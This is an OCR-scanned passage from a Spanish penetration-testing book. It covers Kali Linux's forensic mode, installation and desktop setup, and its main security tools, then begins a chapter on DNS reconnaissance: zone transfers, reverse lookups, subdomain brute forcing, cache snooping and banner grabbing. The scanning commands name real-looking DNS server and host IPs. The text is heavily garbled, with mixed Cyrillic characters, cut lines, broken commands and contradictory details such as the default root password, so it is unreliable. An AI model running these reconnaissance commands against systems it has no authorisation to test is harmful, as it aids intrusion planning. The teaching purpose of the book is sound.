relevantes al realizar una investigación. Se ha de tener en cuenta que debe actuarse con la mayor 
agilidad posible, de cara a un potencial problema en el sistema operativo que corrompa pruebas, un 
fallo eléctrico o cualquier causa que pueda propiciar una pérdida de evidencias. 
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Imagen 01.05: Selección de Kali Linux en Modo Forense. 


Ya desde su antecesor, BackTrack Linux, se introdujo el “Modo Forense” prevaleciendo hasta la 
actualidad en Kali Linux, resultando una herramienta muy útil cuando se necesita hacer un trabajo 
utilizando código abierto forense. 


Dada la importancia de no corromper las evidencias o el entorno en el cual ha ocurrido el incidente 
informático, es necesario que el “modo forense” presente algunos cambios en relación al “modo 
normal”, entre los que se pueden mencionar: 


- El soporte automático para cualquier medio externo ha sido desactivado, por lo que 
memorias flash, USB, unidades de CD, unidades de almacenamiento extraíble, etcétera, no 
serán montados automáticamente al ser insertados en el equipo, de forma que se mantiene el 
control completo por parte del usuario, siendo éste el único responsable 

- Еп primer lugar, no se montará automáticamente ni se hará uso de ningún disco duro 
interno (incluyendo particiones de intercambio) para evitar contaminarlos. Pueden utilizarse 
las herramientas de análisis forense que incluye Kali Linux en modo forense sin temor a 
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perturbar el entorno. El equipo de Offensive Security ha realizado una comprobación 
tomando un hash un disco duro antes y después del uso de Kali Linux en modo forense, y ha 


comprobado que ambos hashes coinciden, verificando que el disco duro no ha sufrido la más 
mínima variación. 


5.Modos de trabajo de Kali 


En Kali Linux existen diferentes modos de trabajo a través de los cuales es posible completar las 


labores profesionales con el único objetivo de minimizar tiempo y esfuerzo, llegando a obtener los 
resultados deseados. 


Para realizar todo esto previamente se debe acudir a la página oficial o a alguno de sus distribuidores 
oficiales y obtener la última versión de Kali Linux. 
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Imagen 01.06: Petición de email y nombre para acceder а la descarga 


esta imagen se puede ver que se hace el pedido de un email y un nombre para acceder a la 
агра del producto, sin embargo no es imprescindible realizar esto, ya que si se hace clic sobre 


d 
la opción “No thanks, just want to download", se accederá al formulario de descarga directamente. 


Una vez pasada la mencionada pantalla, se procederá a definir el tipo de distribución Kali Linux que 
se desea descargar. 


Capítulo 1. Pentesting ES 


Thank you for regatering Download our favour of Kat Limac 


Select reas 


Architecture Custom image Window manager imagetpe  Downioagupe 


б |) (жеш) Gre Tg (so a <a 


Filename: [kabcama-1 0 1-386156 
shatsum (атеѕосокетодевсава7атоазазвегевавааевз 
Sus (мв; [2285 


Imagen 01.07: Formulario de descarga de Kali. 


Tras conseguir descargar Kali, se podría hacer una primera toma de contacto con el entorno. 
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Imagen 01.08: Menú configurable de inicio Kali. 


Entre los modos de uso se encuentran: 


Live-CD 


Este es un modo habitual en las distribuciones de Linux donde se busca hacer uso de la distribución 
sin necesidad de tenerla instalada fisicamente en la máquina, solamente arrancándola desde la 
unidad de cd, lo cual es muy beneficioso en tiempo si solamente se requiere utilizar una o algunas 
de las herramientas incluidas en el sistema operativo, o si simplemente se quiere hacer una primera 
toma de contacto con dicha distribución. 


Como se comentaba anteriormente, Kali Linux está diseñado para que sea usado por un usuario гоо! 
por defecto, sin embargo, ¿Cuál es Іа contraseña de roof? La respuesta es sencilla y viene heredada 
de sistemas BackTrack, donde de forma predeterminada la contraseña para el usuario root era el 
mismo nombre “roof” pero en orden inverso, es decir “roor”. 


Desde la opción Live CD se puede hacer uso de todas las herramientas incluidas, sin embargo los 
cambios que se realicen a documentos no se podrán mantener de manera automática en la máquina 
una vez que finalice la sesión. 
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Instalación en físico 


Para iniciar una instalación en fisico hace falta obtener un archivo iso de Kali Linux, disponible 
desde la web oficial www.kali.org o desde alguno de sus asociados. 


Inicialmente la versión 1.0.1 tenía un tamaño de 2.1 GigaBytes, sin embargo, como se comentaba 
también, Kali está en constante cambio por lo que rápidamente ha evolucionado a la versión 1.0.2 
donde además de crecer técnicamente también lo ha hecho en tamaño de fichero, pasando a ocupar 
2.3GB. 


Al realizar la instalación aunque podrían aparecer algunas advertencias a la hora de cargar drivers y 
componentes, detectar hardware y configurar la red, suele llegar al final sin ningún tipo de problemas. 
En el camino de instalación basta con elegir idioma, ubicación, tipo de teclado, y al contrario de 
BackTrack se designa también la clave de root en la instalación. Se puede incluir el equipo en el 
dominio si se desea, o inventarse uno si se encuentra en una red doméstica. En portátiles se ofrece la 
posibilidad de replicar la interfaz de red, para diversos usos (WLAN y Ethernet). 


Una de las oportunidades que ofrece el uso de Kali tras una instalación en medio físico o máquina 
virtual es la posibilidad de cambiar el escritorio según los propios gustos del usuario. 


Cambiando el escritorio de Kali 


Kali Linux utiliza Gnome por defecto, sin embargo no todos los usuarios son partidarios de usarlo, 
por lo que se ha dejado abierta la posibilidad para que a través de unas fáciles modificaciones se 
pueda pasar al sistema que mejor se adapte a los gustos. Solo es necesario editar la última sección 
de config/package-lists/kali.list.chroot que contiene las entradas relacionas con el ambiente de 
escritorio que haya elegido el usuario. La sección comienza con el siguiente comentario: 


# Graphical desktops depending on the architecture 

# You can replace all the remaining lines with a list of the 

4 packages required to install your preferred graphical desktop 
# or you can just comment everything except the packages of your 
4 preferred desktop. 


Para cambiarlo por un entorno KDE 
kali-defaults 

kali-root-logín 

desktop-base 

kde-plasma-desktop 


GNOME 
gnome-core 
kali-defaults 
kali-root-login 
desktop-base 


LXDE 
kali-defaults 
kali-root-login 
desktop-base 
1xde 
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XFCE 
kali-defaults 
kali-root-login 
desktop-base 
xfce4 

зум 

# cheers to Oxerror 
xorg 

dmenu 

conky 
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MATE 

El escritorio “MATE” no está incluido por defecto en los repositorios de Kali Linux, y requiere de 
algunos pasos adicionales para ser integrado. 

echo "deb http://repo.mate-desktop.org/debian wheezy main” >> /etc/apt/sources, 
list 

apt-get update 

apt-get install mate-archive-keyring 


Después se continúa con: 


apt-get install git live-build cdebootstrap 

# git clone git://git.kali.org/live-build-config.git 

са live-build-config 

mkdir config/archives 

[E "deb http://repo.mate-desktop.org/debian wheezy main" » config/archives/mate. 


iBt.binary 
Echo "deb http://repo.mate-desktop.org/debian wheezy main" > config/archives/mate. 
st.chroot y 
(Ср /usr/share/keyrings/mate-archive-keyring.gpg  config/archives/mate.key.binary 
"Ep /usr/share/keyrings/mate-archive-keyring.gpg config/archives/mate.key.chroot 
echo "sleep 20" >> config/hooks/z sleep.chroot 


Por ültimo agrega el escritorio mate a la lista de paquetes: 
ano config/package-lists/kali.list.chroot 


Después de editarlo, este debería quedar de ésta manera: 


xorg 
mate-archive-keyring 
mate-core 
mate-desktop-environment 


Instalación en VM 


Desde la web oficial también se puede descargar un fichero comprimido de 3 GB de tamaño (“kali- 

linux-1.0-i386-gnome-vm"), el cual una vez descomprimido ocupa 7,60 GB, y contiene un disco 

duro virtual que reserva espacio dinámicamente hasta un máximo de 30 GB donde se encuentra 
instalado Kali. 
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Imagen 01.09: Ficheros que componen el disco duro virtual comprimido. 


Cuando se dice que el disco reserva espacio dinámicamente quiere decir que mientras más espacio 
ocupe en el disco virtual, más espacio ocupará en el disco real, sin embargo tiene el gran inconveniente 
de que cuando se libere el espacio del disco virtual, ya no se recupera el espacio en el disco real. 


Imagen 01.10: Kali Linux corriendo en una máquina virtual. 
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Al igual que sucede en el modo Live CD el usuario predeterminado es root y la contraseña para 
acceder es toor. 


Paseo por Kali 


Unas de las características esenciales y algo que se vería a simple vista a la hora de realizar un 
primer uso de la nueva distribución es la existencia del “Тор 10 Security Tools", una lista con las 10 
herramientas más utilizadas, con mayor demanda y utilidad del mercado. En posteriores capítulos 
de hará un análisis más completo de la mayoría de estas aplicaciones. 


Application: 


Е Accessories 
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E Mantaning Access MW, wireshark 
$ Reverse Engneering MA, zaproxy 
Ў Stress Testing 
Hardware Hacking 
Forensics 
Reporting Tools 


IT yeu cid 


Imagen 01.11: Aplicaciones que conforman el Top 10 Security Tools 


Para ello Offensive Security ha realizado diferentes estudios basado en estadísticas de uso, encuestas 
de popularidad y resultados basados en su amplia experiencia en el mundo de la se 
informática, siendo la lista de herramientas las siguientes: 


zuridad 


* Aircrack-ng: Se trata de un conjunto de software de seguridad inalámbrica que incluye 


un analizador de paquetes de redes, un crackeador de redes WEP y WPA/WPA2-PSK y otro 
conjunto de herramientas de auditoría inalámbrica. 
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* Burp Suite: Es una herramienta escrita integramente en Java que permite realizar test de 
intrusión en aplicaciones web, permitiendo combinar técnicas manuales y automáticas para 
analizar, detectar, atacar y explotar aplicaciones web. 

Incluye elementos tales como un Spider web, un Intruder, un repetidor de llamadas, con lo que 
las peticiones pueden ser automatizadas. 

+ Hydra: Es un crackeador de contraseñas multihilo por fuerza bruta en base a diccionarios. 
Puede crackear prácticamente cualquier servicio (Telnet, POP3, SMTP, IMAP, SMB, SSH V1 y 
2, etcétera) usando una conexión directa o proxys, con o sin SSL. 


Esta herramienta ha obtenido una gran reputación gracias a poder ser ejecutada desde consola 
tanto en sistemas Linux como Windows 


* John: Hace referencia, como no, a John The Ripper, una herramienta muy popular, ya que 
permite comprobar que las contraseñas de los usuarios son lo suficientemente seguras, 

Aplica fuerza bruta para descifrar contraseñas, siendo capaz de romper varios algoritmos de 
cifrado o hash, como DES, SHA-1 entre otros. 

* Maltego: es una aplicación de minería y recolección de información utilizada durante la fase 
de Data Gathering, proceso en el cual se trata de obtener el mayor número de información posible 
sobre un objetivo para su posterior ataque. La información la obtiene de Internet y la representa 
de forma gráfica para que sea más sencillo de analizar. Es una herramienta muy potente, llena 
de opciones que pueden ser muy útiles para investigar empresas, sitios, personas y mucho más. 

Permite iniciar búsquedas a partir de dominios, IPs, ubicaciones geográficas, correos, nombres, 
teléfonos e incluso frases. 


En ésta edición Maltego ha modificado su imagen de inicio adaptándola a la nueva distribución. 


The quieter vou become, (ме mare vos are able 10 hear 


Imagen 01.12: Iniciando Maltego para Kali Linux. 
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+ Metasploit: una forma sencilla de definir Metasploit Framework es que se trata de una 
herramienta para desarrollar y ejecutar exploits contra un equipo remoto. Sin embargo esta 
herramienta dispone de gran cantidad de funcionalidades las cuales son muy utilizadas en el día 
a día por los auditores de seguridad para llevar a cabo sus test de intrusión, pudiendo realizar con 
Metasploit Framework no solamente la explotación y post explotación del sistema, sino también 
los pasos previos a ellos vistos al inicio del capítulo. 


+ Nmap: Es un programa por consola de comandos que sirve para efectuar rastreo de puertos 
y se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o 
servidores en una red informática. Entre las diferentes utilidades que se le da a ésta herramienta 
de encuentran: 

- Identifica puertos abiertos en una computadora objetivo. 

- Determina qué servicios está ejecutando la misma. 

- Obtiene algunas características del hardware de red de la máquina testeada. 

- Contribuye a realizar la labor de fingerprinting determinando qué sistema operativo y la 

versión que utiliza dicho ordenador. 

- Identifica equipos en una red. 
• Sqlmap: Es una herramienta muy útil en los test de intrusión que automatiza el proceso de 
detección y explotación de fallos de tipo SOL Injection y de ésta forma obtener toda la información 
contenida dentro de los servidores de bases de datos. Entre las características reseñables de ésta 
herramienta se encuentran: 

- Soporte completo para MySQL, Oracle, PostgreSQL, Microsoft SOL Server, Microsoft 

Access, DB2 de IBM, SQLite, Firebird, Sybase y SAP MaxDB. 

- Soporte completo para seis técnicas de inyección SQL: boolean-based blind, time-based 

blind, error-based, UNION query, stacked queries y out-of-band. 
Estas y otras características hacen que esta herramienta sea indispensable a la hora de realizar 
una auditoría web. 
* Wireshark: Ésta aplicación es un analizador de paquetes que permite examinar datos de 
una red viva o de un archivo de captura salvado en disco. Analiza la información capturada, a 
través de los detalles y sumarios por cada paquete. Aunque su uso docente está muy extendido, 
Wireshark no solamente se enmarca en el área educativa, ya que en la actualidad se ha convertido 
en una herramienta profesional imprescindible para los auditores informáticos. 
* Zaproxy: es una herramienta fácil de usar y que forma parte de las aplicaciones de uso habitual 
en el proceso de pentesting para encontrar vulnerabilidades en aplicaciones web. 
Está diseñado para ser utilizado por usuarios con diferente nivel en seguridad y, como tal, es 
ideal para desarrolladores y probadores funcionales que son nuevos en el hacking ético, además 
de ser un conjunto de herramientas muy útil para pentesters de nivel avanzado. 


Además de las 10 herramientas antes mencionadas, se incluyen más de 300 aplicaciones que realizan 
diferentes labores como: 
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- Recopilación de Información. A su vez viene dividido en análisis de DNS, análisis de 
ruteo, análisis de telefonía, análisis de tráfico, análisis de VoIP, análisis OSINT, análisis SMB, 
análisis SMTP, análisis SNMP, análisis SSL, análisis VPN, detección de SO, detección de 
servicio, escáner de redes, identificación de host en línea, identificación de IPS/IDS, etcétera, 
habiendo más de 100 herramientas solo en éste apartado. 

- Análisis de Vulnerabilidades. Evaluación de base de datos, evaluación de código abierto, 
herramientas Cisco, herramientas para fuzzing, OpenVas y otros escáneres. 


- Aplicaciones web. Aplicaciones Proxy, aplicaciones para fi escáner de 


vulnerabilidades web, explotación de base de datos, identificación de CMS, Identificación de 
IDS/IPS e indexadores WEB. 
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Imagen 01.13: Lista de aplicaciones disponibles para auditorías web. 


Ataques de contraseñas. Ataques de conexión, ataques sin conexión y herramientas para 
GPL 
- Análisis Forense. Antiforense digital, forense digital, análisis forense en redes, 


herramientas de análisis forense, herramientas forenses de antivirus, herramientas forenses 


de hashes, herramientas forenses de recuperación, herramientas forenses para contraseñas, 
herramientas forenses para imágenes, herramientas forenses para PDF, herramientas forenses 
para RAM y suite de análisis forense 
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Imagen 01.14: Lista de aplicaciones disponibles para análisis forense. 


- Herramientas de explotación. Ataques Cisco, base de datos de exploits, herramientas de 
ingeniería social, Metasploit y Network Explotation 

- Sniffing/envenenamiento. Envenenamiento de redes, herramientas VoIP, husmeando la 
web, husmeando redes, voz y vigilancia 

- Acceso. Herramientas para tüneles, puertas traseras para sistemas operativos, puertas 
para web 


traseras 


- Ingeniería Inversa, Depurador, desensamblador y otras hei 


mientas de ingeniería inversa 


- Pruebas de stress. Pruebas de stress para redes, pruebas de stress para VoIP, pruebas de 
stress para web, y pruebas de stress para WLAN 


- Hackeo de hardware. Herramientas Android y Herramientas Arduino. 
- Herramientas de reporte. Capturador de medios y gestión de evidencia 


rvicios del sistema. HTTP, Metasploit, MySQL y SSH 
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- Ataques Wireless. Herramientas Bluetooth, herramientas RFID/NFC, y otras herramientas 
Wireless 
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Imagen 01.15: Lista de aplicaciones disponibles para ataques Wireless. 


En los siguientes capítulos se mostrarán con más detalle algunas de estas herramientas y su aplicación 
en los procesos de pentesting en el mundo profesional. 


Entre algunos elementos a destacar, además de los ya mencionados, se encuentra establecido 


Iceweasel 18.0.1 como navegador por defecto. 


About Iceweasel 


Iceweasel 


18.0.1 


Iceweasel is designed by Mozilla, a 


global community working together to keep the 
Web open, public and accessible to al. 


Sound interesting? Get involved! 


Imagen 01.16: Acerca de Iceweasel. 
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al 


tro elemento a mencionar es la lista de repositorios que puede verse en “/etc/apt/sources.lisf”, allí 
añadirse, modificarse o eliminarse a mano la localización de los repositorios. Para visualizar 
ido de dicho fichero es posible utilizar el sistema que resulte más cómodo. 


га terminar se pude acceder a una de las herramientas con mayor peso en Kali Linux y no es otra 
e Metasploit Framework. 


no se encuentra un motor de base de datos al cual conectarse como puede ser MySQL, PostgreSQL, 
otros, el framework omite ese paso y guarda todo lo necesario para su ejecución en memoria. 


desea guardar información de algún escaneo realizado desde el framework como las 

jentas Nmap o Nessus sí se debería conectar previamente a un motor de base de datos. Sin 

o los servicios de red se encuentran deshabilitados por defecto, por lo que si hace falta habrá 
гагіоѕ en su determinado momento. 


и por ejemplo puede usar PostgreSQL como su base de datos por lo que necesita ser 
previamente. 


io es iniciado con la sintaxis "service [Nombre de servicio] start", en este caso para 
servicio de PostgreSQL debería teclearse por línea de comandos “service postgresql start" 
ial iniciará inmediatamente dicho servicio. 


0 de que se desee que el servicio se inicie inmediatamente con el equipo, basta con hacer uso 
nando “update-rc.d [Nombre de servicio] enabli 


22 iniciado PostgreSQL lo siguiente será ejecutar el servicio Merasploit de la forma antes 
La primera vez que se ejecute el servicio, se creará un usuario de base de datos ms/3 y 
e de datos llamada ms/3. El servicio también ejecutará los servidores RPC y web requeridos. 


alizar los pasos previos es posible iniciar msfconsole y verificar la conectividad de la base de 
el comando: dh status 
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Capítulo II 
Recogida de información 


1. Introducción al Gathering 


Enla introducción de la “Guía Inteco de Seguridad sobre Information Gathering” se constata el hecho 
porel cual, el éxito de muchos de los ataques e intrusiones que sufren empresas y organizaciones se 
debe en buena medida, a la cantidad de información que directa e indirectamente un atacante es capaz 
de obtener Sobre sus sistemas. Esta fase, en la que un atacante intenta recopilar toda la información 
que sea posible sobre su objetivo, incluyendo aquella que de manera consciente la organización 
haga püblica pero sin ser consciente de las implicaciones que de ella se pueden deducir, se denomina 
onnaissance y es, sin duda alguna, una de las más importantes en el proceso de intrusión. Durante 
_ fase, el atacante, haciendo uso de diversas técnicas, más o menos automatizadas, obtiene 
ión de la infraestructura de red, documentos, empleados, etcétera con la que más adelante 
ar a cabo un ataque más específico. 


ente el proceso de recogida de información se encuentra dividido en dos fases. La primera 
1 el procedimiento seguido para recolectar información de forma externa a la organización, y 
о! ina External Footprinting. La segunda, se centra en las actividades que se pueden realizar 

Vez que el atacante haya conseguido acceso parcial a la red interna, y donde intentará volver a 
conseguir la mayor cantidad de información posible, para seguir escalando el ataque a otros equipos 
dentro de la organización. A esta segunda fase se la denomina Internal Footprinting (este concepto 
se verá como parte del proceso de postexplotación). 


Para la estructura de este capítulo se va a seguir el planteamiento propuesto por el Penetration Testing 
Execution Standard en la sección de directrices técnicas. En cada sección se presentará un pequeño 
Apartado de teoría obtenida de diversas fuentes de confianza, y se comentará el funcionamiento de 
aquellas herramientas incluidas en Kali. No se mencionarán todas las herramientas, puesto que se 
requeriría de un capítulo o incluso un libro por sección, pero sí se detallarán las que se consideren 
más útiles o sencillas en cada situación. 


Ё пиш 
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2. External Footprinting 


Del mismo modo que el proceso de recogida de información está estructurado en dos fases 
claramente diferenciadas, a su vez las técnicas de recogida de información desde el exterior están 
categorizadas en dos subcategorías en función del grado de "agresividad" de las mismas. Por un 
lado, está el descubrimiento activo, denominado Active Footprinting, que destaca por interactuar 
directamente con la infraestructura de la empresa objetivo mediante consultas al DNS, análisis de 
las cabeceras HTTP, enumeración de puertos y Sus servicios, etcétera. Y por otro lado, se encuentra 
el descubrimiento pasivo, lógicamente denominado Pasive Footprinting que recurre a la consulta de 
la información previamente indexada por motores de büsqueda, registros püblicos, foros, etcétera. 


Active Footprinting 


Descubrimiento DNS 

Cada uno de los equipos con salida directa a Internet tiene al menos una dirección IP asignada. Para 
acceder a ellos es posible hacerlo especificando dicha dirección IP (###.###.###.###), sin embargo 
dicha opción no resulta cómoda, por lo que es preferible recurrir al uso de nombres de dominio o 
más especificamente, a direcciones FQDN del estilo de www.misitioweb.es. 


Resulta posible asociar nombres en lenguaje casi natural con direcciones numéricas gracias al sistema. 
denominado DNS (Sistema de Nombres de Dominio). El servicio DNS (Domain Name System), 
es un sistema de nomenclatura jerárquica para cualquier recurso conectado a Internet o a una red 
privada DNS. En base a lo comentado anteriormente se puede definir como un servicio esencial 
para el funcionamiento de las redes de ordenadores. Los sistemas DNS ofrecen gran cantidad de 
información de utilidad. Este servicio simplifica el acceso por parte del usuario y administradores 
a los servicios, creando una capa da abstracción que enmascara las direcciones de red con cadenas 
de texto, que son más sencillas de recordar. Además, por regla general, los nombres de los sistemas. 
suelen describir la función que desempeñan para ayudar a los administradores de sistemas, 
desarrolladores y usuarios finales a recordar y acceder a los mismos (característica también utilizada 
por los atacantes para enumerar posibles servicios ocultos). Como apunte adicional conviene saber 
que la información del protocolo DNS es almacenada en registros. 


А continuación se ofrece un listado de los registros y la información que éstos almacenan: 
= А = Address (Dirección) Este registro se usa para traducir nombres de hosts a direcciones 
IPv4. 
- AAAA = Address (Dirección). Este registro se usa еп IPv6 para traducir nombres de hosts 
à direcciones IPv6. 
- CNAME - Canonical Name (Nombre Canónico). Se usa para crear nombres de hosts 
adicionales, o alias, para los hosts de un dominio. Es usado cuando se están corriendo 
mültiples servicios (como ftp y servidores web) en un servidor con una sola dirección IP. 
Cada servicio tiene su propia entrada de DNS (como fip.ejemplo.com. у www.ejemplo. 


"Capítulo II. Recogida de información EN 


com.). Esto también es utilizado cuando se ejecutan múltiples servidores http, con diferentes 
nombres, sobre el mismo host. 

- NS = Name Server (Servidor de Nombres) Define la asociación que existe entre un 
nombre de dominio y los servidores de nombres que almacenan la información de dicho 
dominio. Cada dominio se puede asociar a una cantidad cualquiera de servidores de nombres. 
- MX (registro) = Mail Exchange (Registro de Intercambio de Correo). Asocia un nombre 
de dominio a una lista de servidores de intercambio de correo para ese dominio. 


- PTR = Pointer (Indicador). También conocido como “registro inverso”, funciona a la 
inversa del registro A, traduciendo IPs en nombres de dominio. 

- ЅОА = Start of Authority (Inicio de autoridad). Proporciona información sobre el servidor 
DNS primario de la zona. 

- HINFO = Host Information (Información del equipo). Descripción del host, permite que 
la gente conozca el tipo de máquina y el sistema operativo al que corresponde un dominio. 

- TXT = Text (Información textual). Permite a los dominios identificarse de modos 
arbitrarios. 

- LOC = Location (Localización). Permite indicar las coordenadas del dominio. 

- WKS. Generalización del registro MX para indicar los servicios que ofrece el dominio. 
Está obsoleto en favor de SRV. 

- SRV = Services (Servicios). Permite indicar los servicios que ofrece el dominio. RFC 
2782, 

- SPF = Sender Policy Framework (Marco de Directivas de Remitente). En este registro se 
especifican los hosts que están autorizados a enviar correo desde el dominio dado. 


En base a todo lo anterior se puede apreciar como el servicio DNS resulta fundamental durante 
Bl proceso de Information Gathering gracias al cual se puede generar un primer mapa de la 
Ifraestructura de red objetivo. 


Cali dispone de una docena de herramientas relacionadas con la recogida de información. A 
continuación se presenta el listado de dichas herramientas: 


1. dnsdict6. 5. dnsrevenumó. 9. maltego. 
2. dnsenum. 6. dnstracker. 10, nmap. 

3. dnsmap. 7. dnswalk. 11. urlcrazy. 
4. dnsrecon. 8. fierce. 12 zenmap. 


primeras 7 herramientas están enfocadas exclusivamente en obtener información de los 
ervidores DNS, el resto pueden ser consideradas como más genéricas no enfocadas exclusivamente 
а obtener información a través de este medio. 
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A continuación, se muestran las distintas técnicas de enumeración de información en la que 
intervienen los servidores DNS y que herramientas de las anteriores se pueden utilizar para recabar 
dicha información. 


Transferencia de Zona 
La transferencia de zona es el término utilizado para referirse al proceso por el cual se copia el 
contenido de un archivo de zona DNS de un servidor DNS principal en un servidor DNS secundario. 


Las transferencias de zona siempre son iniciadas por el servidor DNS secundario. El servidor DNS 
principal simplemente responde a la solicitud de una transferencia de zona. El servidor primario 
debe filtrar por dirección IP qué servidores secundarios pueden realizar dichas transferencias. En 
los casos en los que estos no se encuentran correctamente configurados es posible obtener todas las 
zonas de los dominios que administra el DNS. 


El procedimiento manual para conseguir la transferencia de zona, consiste en ejecutar nslookup, 
buscar un servidor DNS autoritativo que sea público y pedirle un volcado de todas las direcciones 
DNS almacenadas. 


En Kali una de las herramientas que permite realizar este procedimiento de manera automatizada es 
dnsenum. Con el comando dnsenum dominio web, se ejecuta de manera automatizada un análisis 
sobre el sitio web buscando servidores con la transferencia de zona habilitada y realiza el volcado. 


-4 dneenum sicud 
pl. VERSION: 1.2.2 


Imagen 02.01: Ejemplo del uso de la herramienta dnsenum. 


Dando como resultado un listado con todos los equipos de la organización. 


o II. Recogida de información 
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Imagen 02.02 Transferencia de zona realizada con herramienta dnsenum. 


lución Inversa 

olución DNS más común es la creada para traducir un nombre para una dirección IP, sin 
go ese no es el único tipo de resolución DNS, También existe la denominada resolución 
que hace la traducción de una dirección IP a un nombre. 


п sus inicios la resolución inversa se utilizaba como mecanismo auxiliar de seguridad para los 
ч s en Internet, comparando los resultados de una resolución inversa contra la resolución 
del nombre para dirección IP. En el caso de los resultados iguales, se permitía, por ejemplo, 
acceso remoto al servidor. 


ra la resolución inversa fueron creados nombres de dominio especiales: in-addr.arpa para bloques 
4 e ip6.arpa para bloques IPv6. 


poner la dirección ЇР dentro de la jerarquía de nombres DNS, es necesario hacer una operación 
gada de crear un nombre que represente la dirección IP dentro de dicha estructura. 


п la jerarquía de nombres del sistema DNS la parte más a la izquierda es la más específica mientras 
ue la parte de la derecha es considerada la menos específica. Sin embargo, la numeración de 
ecciones IP se realiza al revés, es decir, lo más específico queda más a la derecha en la dirección 
? lo cual implica que para resolverlo se deba hacer una operación que invierta cada parte de la 
ión IP y luego añada el nombre de dominio reservado para la resolución inversa (in-addr.arpa 


їрб.ағра) 


or ejemplo, considerando la dirección IPv4 10.0.0.1. Para colocarla en el formato necesario, se 
invertir cada byte y añadir el dominio para resolución inversa al final: /.0.0. /0.in-addr.arpa. 
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Teniendo en cuanta la idea anterior es posible, si se conoce el rango de direcciones IP del dominii 
auditar, preguntar por cada uno de los registros PTR asociados a cada dirección IP y en función 
la respuesta obtenida realizar la enumeración de todos los equipos. 


A continuación se presenta un caso de ejemplo en el que se analiza un pequeño rango IP de 
direcciones: 


PTR өл Ж же аат тШ A 19% 
4 Records Founa 
төөгө 


KALD LINUR 


Imagen 02.03 Realización de DNS Brutting con la herramienta dnsrecon. 


Además a modo de ejemplo, en Nmap / zenmap, y sin intención de profundizar en el manejo de 
herramienta, es posible ejecutar el comando nmap -sL y pasarle el rango de direcciones IP, con 1 
que se obtendría un resultado similar: 


Comm 


fite ee 


Imagen 02,04 Simulación de DNS Brutting con la herramienta zenmap. 


DNS Brutting 
Consiste en la utilización de un diccionario para intentar enumerar mediante fuerza bruta nombres 


de subdominios existentes bajo el dominio principal de la organización. El procedimiento se basa en 


observar las respuestas del servidor DNS ante una petición válida y las respuestas ante una dirección 
no existente. 


Kali, además de con el comando explicado para la trasferencia de zona еп la que se puede 
| їйсаг un diccionario de origen, los comandos dnsdictó y dnsmap también son válidos. Los 
comandos a utilizar en cada uno de los casos serían los siguientes: 


p» - dnsenum dominio -f diccionario 


у - dhsdict6 dominio / dnsdictó dominio diccionario 


== 

" o 10vé address for NS entries found An DNS for dom] b 
Eror mam чш. a 

о Труб address far К entries found in DNS TOf donde as. 


ng 2 thresds for 1418 words. 


Lan os. Йө PR 
АУ À ЖЫ 


Imagen 02.05 Ejemplo del uso de la herramienta dnsdictó. 


=  dnsmap dominio / dnsmap dominio -w diccionario 


patio: dnsmap vam m 
wmap 0.38 - ONS Network Маррег by pegvac (gnucitizenmorg) 


[+] searching (subidosains tor mem using built-in werdlist 
[+] using maximus random delay of 18 willisecond[s] batwWem requests 


P rtp UR 


15 
15% 


Imagen 02.06: Ejemplo del uso de la herramienta dnsmap. 


el caso del dnsdictó y del dnsmap se puede apreciar, por los comandos expuestos, que ambos 
Van un diccionario integrado con los nombres de subdominios más comunes. En caso de querer 

un diccionario externo más completo, aparte de construirse uno personal, en la web de Google 
del proyecto de dnsenum se encuentra disponible un “pequeño” diccionario de 3,6 MB. 
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DNS Caché Snooping 

La caché DNS tiene el rol de traductor de direcciones URL a direcciones IP y viceversa. Es el 
servicio habitual, los proveedores de servicios de internet generalmente suministran varios a sus 
clientes. De esta forma cuando un equipo necesita traducir nombres a direcciones 1Р se recurre a 
estos servidores. 


Cada vez que un usuario quiere resolver un nombre de dominio, éste pregunta al servidor DNS que 
tiene configurado. Si se encuentra activada la caché, antes de solicitar la resolución por medio de un 
sistema de consultas recursivas, mirará primero si tiene una resolución válida de ese nombre en su 
caché. Si lo tiene, devolverá esa entrada. En caso contrario, comenzará el sistema de resolución DNS 
recursiva y, una vez resuelto, almacenará'en la caché el resultado y lo devolverá. 


En base a este funcionamiento, si se quiere saber si se ha resuelto un determinado dominio 
recientemente, es suficiente con configurar las consultas al servidor DNS desactivando la resolución 
recursiva de las mismas. Es decir, consultando sólo la caché del DNS. Si se ha pedido en un tiempo 
reciente se obtendrá la resolución, mientras que si no se ha solicitado se obtendrá una respuesta 
negativa de resolución. 


Una de las utilidades a usar para explotar esta funcionalidad es dnsrecon, y el comando a utilizar 
sería el siguiente: 


- dnsrecon.py -t snoop -n servidor dns -D listado webs 


А continuación una captura a modo de ejemplo: 


rootükalico:-f dnsrecon.py -t snoop -n demís ps -D Desktop/dominios 
*] Performing Cache Snooping against NS Server: 213.144.49.35 


І 

[ Name: www.google.com. TTL: 43 Address: 179 fw 842 Type: А 

t www.google.com. 43 Address: 170 ан ша $43 Type: А 

Г Www „google.com. 43 Address E gw #44 Type: A 

Г www.google.com. 43 Address. 40 Type: А 

[ www.google.com. 43 Address: i | TU Ёа Type: A 

І www.ingdirect.es. TTL: 167543 Address: 19 ШШШ 12 Туре: А 
rootgkalico:=* B 


Imagen 02.07: Realización de DNS Cache Snooping con la herramienta dnsrecon. 


Banner Grabbing 

Uno de las técnicas utilizadas a la hora de realizar controles sobre una aplicación web es la 
información que puede obtenerse a través de los banner que ofrecen los servicios. Este concepto 
se refiere a la interacción manual en texto plano para obtener información sobre el servidor donde 
reside la aplicación web. 


El banner grabbing es una de las técnicas más simples para conocer qué infraestructura o sistema se 
encuentra detrás de una aplicación web o servicio. En otras palabras, está estrechamente relacionado 
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con el fingerprinting para detectar el sistema operativo. Por ejemplo, en los servidores HTTP 
existen, entre otros, tres tipos de servidores mayoritariamente, los servidores Internet Information 
Services que corre sobre el sistema operativo de Microsoft Windows Server, los servidores Apache, 
que generalmente corren sobre Linux, y los servidores Nginx, que también corren sobre Linux. Y en 
los tres casos la respuesta ofrecida por el servidor casi siempre incluye los términos "IIS", “apache” 
y “nginx” respectivamente. 


Kali ofrece, entre otras, la herramienta ncar, herramienta considerada como la evolución de Netcat 
y posee una serie de funcionalidades que la hacen más sencilla a la hora de utilizarla. No obstante, 
айп es posible ejecutar Netcaf enviando un mensaje sin contenido a cada uno de los puertos de la 
dirección IP del servidor a auditar. 


En el siguiente ejemplo se ha obtenido el banner de varios de los servicios de la dirección IP. 
69.89.31.180, con el comando “echo “” | nc -v -n -w1 69.89.31.180 21-80” y se han obtenido los 
siguientes resultados, 


|( UNKNOWN] ET Е HOME) 27 (7) : Connection timed out 
(UNKNOWN) [6f 28] 26 (?) open 

